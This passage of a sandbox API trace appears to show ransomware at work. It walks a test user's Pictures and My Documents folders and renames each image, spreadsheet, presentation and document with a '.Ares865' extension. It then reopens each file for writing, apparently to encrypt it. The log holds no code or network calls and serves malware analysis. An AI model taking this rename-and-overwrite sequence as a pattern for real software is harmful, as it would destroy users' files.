HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\dxkWKFD3SrT0.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\dxkwkfd3srt0.gif.ares865"), dwFlags=0x1) returned 1 [0093.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\dxkWKFD3SrT0.gif.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\dxkwkfd3srt0.gif.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.959] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=63993) returned 1 [0093.963] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\p373_seF.png.Ares865") returned 87 [0093.963] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\p373_seF.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\p373_sef.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\p373_seF.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\p373_sef.png.ares865"), dwFlags=0x1) returned 1 [0093.964] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\p373_seF.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\p373_sef.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.964] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=44262) returned 1 [0093.967] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\Ze OYHzopDMsBA3Y6i.bmp.Ares865") returned 97 [0093.967] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\Ze OYHzopDMsBA3Y6i.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\ze oyhzopdmsba3y6i.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\Ze OYHzopDMsBA3Y6i.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\ze oyhzopdmsba3y6i.bmp.ares865"), dwFlags=0x1) returned 1 [0093.968] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\Ze OYHzopDMsBA3Y6i.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\ze oyhzopdmsba3y6i.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.968] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=34008) returned 1 [0093.974] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk" [0093.974] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk\\lFURsmj.bmp.Ares865") returned 107 [0093.974] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk\\lFURsmj.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\ohj1rj4dsfsivvokjgak\\lfursmj.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk\\lFURsmj.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\ohj1rj4dsfsivvokjgak\\lfursmj.bmp.ares865"), dwFlags=0x1) returned 1 [0093.975] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk\\lFURsmj.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\ohj1rj4dsfsivvokjgak\\lfursmj.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.975] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=89959) returned 1 [0093.980] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk\\Y ap1kRxotib eF7W1R.bmp.Ares865") returned 119 [0093.980] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk\\Y ap1kRxotib eF7W1R.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\ohj1rj4dsfsivvokjgak\\y ap1krxotib ef7w1r.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk\\Y ap1kRxotib eF7W1R.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\ohj1rj4dsfsivvokjgak\\y ap1krxotib ef7w1r.bmp.ares865"), dwFlags=0x1) returned 1 [0093.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\ObrmFTWwAUwqwhkp\\oHJ1Rj4DsfsiVvokjGAk\\Y ap1kRxotib eF7W1R.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\obrmftwwauwqwhkp\\ohj1rj4dsfsivvokjgak\\y ap1krxotib ef7w1r.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.983] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36647) returned 1 [0093.989] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk" [0093.989] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\eeoKkZRveFQ4qND0.png.Ares865") returned 85 [0093.989] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\eeoKkZRveFQ4qND0.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\eeokkzrvefq4qnd0.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\eeoKkZRveFQ4qND0.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\eeokkzrvefq4qnd0.png.ares865"), dwFlags=0x1) returned 1 [0093.990] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\eeoKkZRveFQ4qND0.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\eeokkzrvefq4qnd0.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.990] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8994) returned 1 [0093.992] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\FUItO7Wqxmu39k8AB.png.Ares865") returned 86 [0093.993] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\FUItO7Wqxmu39k8AB.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\fuito7wqxmu39k8ab.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\FUItO7Wqxmu39k8AB.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\fuito7wqxmu39k8ab.png.ares865"), dwFlags=0x1) returned 1 [0093.993] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\FUItO7Wqxmu39k8AB.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\fuito7wqxmu39k8ab.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.993] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36276) returned 1 [0093.997] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\JSuwEr1Q.bmp.Ares865") returned 77 [0093.997] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\JSuwEr1Q.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\jsuwer1q.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\JSuwEr1Q.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\jsuwer1q.bmp.ares865"), dwFlags=0x1) returned 1 [0093.997] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\JSuwEr1Q.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\jsuwer1q.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0093.998] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=39867) returned 1 [0094.005] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\KrNSz.png.Ares865") returned 74 [0094.005] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\KrNSz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\krnsz.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\KrNSz.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\krnsz.png.ares865"), dwFlags=0x1) returned 1 [0094.005] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\lHkSyhM2yL\\doxPgk\\KrNSz.png.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\lhksyhm2yl\\doxpgk\\krnsz.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.006] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17627) returned 1 [0094.008] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NetHood" [0094.008] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents" [0094.009] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\-UzRn58SF_1E.xlsx.Ares865") returned 68 [0094.009] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\-UzRn58SF_1E.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\-uzrn58sf_1e.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\-UzRn58SF_1E.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\-uzrn58sf_1e.xlsx.ares865"), dwFlags=0x1) returned 1 [0094.010] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\-UzRn58SF_1E.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\-uzrn58sf_1e.xlsx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.010] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=31090) returned 1 [0094.013] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\1aPczIMh3DXyXN37.xlsx.Ares865") returned 72 [0094.013] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\1aPczIMh3DXyXN37.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\1apczimh3dxyxn37.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\1aPczIMh3DXyXN37.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\1apczimh3dxyxn37.xlsx.ares865"), dwFlags=0x1) returned 1 [0094.014] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\1aPczIMh3DXyXN37.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\1apczimh3dxyxn37.xlsx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.014] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11382) returned 1 [0094.016] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\50h53E.ppt.Ares865") returned 61 [0094.016] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\50h53E.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\50h53e.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\50h53E.ppt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\50h53e.ppt.ares865"), dwFlags=0x1) returned 1 [0094.017] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\50h53E.ppt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\50h53e.ppt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.017] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28069) returned 1 [0094.020] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\9CQSf1.pptx.Ares865") returned 62 [0094.021] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\9CQSf1.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\9cqsf1.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\9CQSf1.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\9cqsf1.pptx.ares865"), dwFlags=0x1) returned 1 [0094.021] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\9CQSf1.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\9cqsf1.pptx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.022] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16027) returned 1 [0094.024] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\bpyt e.docx.Ares865") returned 62 [0094.024] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\bpyt e.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\bpyt e.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\bpyt e.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\bpyt e.docx.ares865"), dwFlags=0x1) returned 1 [0094.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\bpyt e.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\bpyt e.docx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.025] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=90236) returned 1 [0094.031] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\desktop.ini.Ares865") returned 62 [0094.031] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0094.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.043] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=402) returned 1 [0094.046] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\ecAaAAeTG5m0hZZZ.pptx.Ares865") returned 72 [0094.046] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\ecAaAAeTG5m0hZZZ.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\ecaaaaetg5m0hzzz.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\ecAaAAeTG5m0hZZZ.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\ecaaaaetg5m0hzzz.pptx.ares865"), dwFlags=0x1) returned 1 [0094.047] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\ecAaAAeTG5m0hZZZ.pptx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\ecaaaaetg5m0hzzz.pptx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.048] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=48294) returned 1 [0094.054] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Ep4b.xls.Ares865") returned 59 [0094.054] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Ep4b.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\ep4b.xls"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Ep4b.xls.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\ep4b.xls.ares865"), dwFlags=0x1) returned 1 [0094.055] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Ep4b.xls.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\ep4b.xls.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.055] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=81161) returned 1 [0094.061] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\etwmO4c1ImsF9psAO.docx.Ares865") returned 73 [0094.061] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\etwmO4c1ImsF9psAO.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\etwmo4c1imsf9psao.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\etwmO4c1ImsF9psAO.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\etwmo4c1imsf9psao.docx.ares865"), dwFlags=0x1) returned 1 [0094.062] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\etwmO4c1ImsF9psAO.docx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\etwmo4c1imsf9psao.docx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.062] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1091) returned 1 [0094.064] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\F7w4O_tqKw.xlsx.Ares865") returned 66 [0094.064] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\F7w4O_tqKw.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\f7w4o_tqkw.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\F7w4O_tqKw.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\f7w4o_tqkw.xlsx.ares865"), dwFlags=0x1) returned 1 [0094.065] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\F7w4O_tqKw.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\f7w4o_tqkw.xlsx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0094.065] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=35041) returned 1 [0094.068] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Fo93gd6JcbbXy S1 9Y.ppt.Ares865") returned 74 [0094.068] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Fo93gd6JcbbXy S1 9Y.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\fo93gd6jcbbxy s1 9y.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\My Documents\\Fo93gd6JcbbXy S1 9Y.ppt.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\my documents\\fo93gd6jcbbxy s1 9y.ppt.ares865"), dwFlags=0x1) returned 1 [0094.069] CreateFileW 